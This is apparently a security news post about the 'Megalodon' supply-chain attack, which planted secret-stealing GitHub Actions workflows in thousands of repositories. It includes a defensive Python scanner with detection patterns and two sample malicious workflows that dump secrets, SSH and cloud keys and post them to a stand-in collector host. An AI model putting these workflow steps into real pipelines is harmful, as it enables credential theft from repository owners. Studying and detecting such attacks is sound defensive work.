A large-scale automated attack dubbed 'Megalodon' compromised 5,561 GitHub repositories by committing malicious CI workflows that steal credentials and secrets from the build environment. The attack came in two variants: one whose workflow runs on every push or pull request, and one that plants a dormant workflow which does nothing until it is triggered on demand through the GitHub API. The campaign exfiltrated a range of credentials, including cloud access keys, SSH keys, and secrets found in source code.
Background
Software supply chain attacks targeting open source repositories have become increasingly common, with attackers exploiting CI/CD pipelines to distribute malware and steal credentials. GitHub Actions workflows are a particularly attractive target: a workflow file committed to a repository runs with access to that repository's configured secrets and to the GITHUB_TOKEN issued for the run, and it can read and modify the checked-out source, so a single malicious workflow gives an attacker everything the pipeline can reach.
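The two trigger styles described above translate directly into something a repository owner can check for. The scanner below is an added example written for this page, not code from the Megalodon report or from any tool it names. The exfiltration indicators it looks for (dumping `toJSON(secrets)` or the process environment, base64-encoding, posting to an external URL, reading `~/.ssh` or `~/.aws`) and the three sample workflows are constructed assumptions, not a description of the actual Megalodon payload; the trigger parsing is a deliberately small text-based reader of the top-level `on:` key so the script runs without PyYAML.

```python
"""Flag GitHub Actions workflows whose trigger and contents match the two
variants described above: a stealer that fires on every push or pull request,
and a dormant workflow that only runs when dispatched through the GitHub API.
Example code written for this page; indicators and samples are assumptions."""
import re

# Exfiltration tells (assumption: typical patterns, not the Megalodon payload).
INDICATORS = {
    "dumps_all_secrets": re.compile(r"toJSON\(\s*secrets\s*\)", re.I),
    "dumps_environment": re.compile(r"\b(printenv|env\s*\|)", re.I),
    "outbound_http": re.compile(r"\b(curl|wget|Invoke-WebRequest)\b[^\n]*https?://", re.I),
    "encodes_payload": re.compile(r"\bbase64\b", re.I),
    "reads_ssh_or_cloud_keys": re.compile(r"(~|\$HOME)/\.(ssh|aws|kube|config/gcloud)", re.I),
}

# Events that can be fired on demand through the GitHub REST API.
API_TRIGGERS = {"workflow_dispatch", "repository_dispatch"}
# Events fired by ordinary development activity.
CODE_TRIGGERS = {"push", "pull_request", "pull_request_target"}


def workflow_triggers(text):
    """Return the event names under the top-level `on:` key.
    Handles `on: push`, `on: [push, pull_request]` and the nested mapping form."""
    lines = text.splitlines()
    for i, line in enumerate(lines):
        m = re.match(r"^(?:on|\"on\"|'on'):\s*(.*?)\s*$", line)
        if not m:
            continue
        inline = m.group(1)
        if inline:  # scalar or flow list on the same line
            return {t.strip() for t in inline.strip("[]").split(",") if t.strip()}
        triggers, key_indent = set(), None
        for nxt in lines[i + 1:]:
            if not nxt.strip() or nxt.lstrip().startswith("#"):
                continue
            indent = len(nxt) - len(nxt.lstrip())
            if indent == 0:
                break  # back at top level: the `on:` block is over
            if key_indent is None:
                key_indent = indent  # first nested line sets the event-key depth
            if indent == key_indent:  # deeper lines are per-event filters, skip them
                triggers.add(nxt.strip().lstrip("- ").rstrip(":").strip())
        return triggers
    return set()


def classify(text):
    """Label one workflow: which events trigger it and which indicators it hits."""
    triggers = workflow_triggers(text)
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(text))
    if len(hits) < 2:  # a lone curl or base64 is normal in CI; require two tells
        verdict = "clean"
    elif triggers and triggers <= API_TRIGGERS:
        verdict = "dormant-api-triggered"
    elif triggers & CODE_TRIGGERS:
        verdict = "push-triggered-stealer"
    else:
        verdict = "suspicious"
    return {"triggers": triggers, "indicators": hits, "verdict": verdict}


def scan(workflows):
    """Classify a mapping of path -> workflow text; returns path -> verdict."""
    return {path: classify(text)["verdict"] for path, text in workflows.items()}


# Constructed sample workflows (not real files from any compromised repository).
SAMPLE_STEALER = """name: CI
on: [push, pull_request]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Build
        env:
          ALL_SECRETS: ${{ toJSON(secrets) }}
        run: |
          printenv | base64 -w0 > /tmp/.p
          curl -s -X POST --data-binary @/tmp/.p https://collector.example/upload
"""

SAMPLE_DORMANT = """name: Maintenance
on:
  workflow_dispatch:
    inputs:
      task:
        required: false
jobs:
  run:
    runs-on: ubuntu-latest
    steps:
      - run: |
          tar czf - ~/.ssh ~/.aws 2>/dev/null | base64 -w0 | curl -s -X POST -d @- https://collector.example/ingest
"""

SAMPLE_BENIGN = """name: Tests
on:
  push:
    branches: [main]
  pull_request:
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: pip install -r requirements.txt
      - run: pytest -q
"""

if __name__ == "__main__":
    samples = {"ci.yml": SAMPLE_STEALER, "maintenance.yml": SAMPLE_DORMANT, "tests.yml": SAMPLE_BENIGN}
    for path, verdict in scan(samples).items():
        print(f"{path}: {verdict}")
```

Run it over `.github/workflows/*.yml` on every branch, not just the default one: a `workflow_dispatch` workflow can be dispatched through the API against any ref on which the file exists, so a dormant variant parked on a stale branch is still live. Treat the verdicts as triage, not proof; the regexes are deliberately simple and a benign installer script that pipes `curl` into `sh` will also trip the outbound indicator.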
- Source: Lobsters
- Published: May 22, 2026 at 05:05 PM
- Score: 9.0 / 10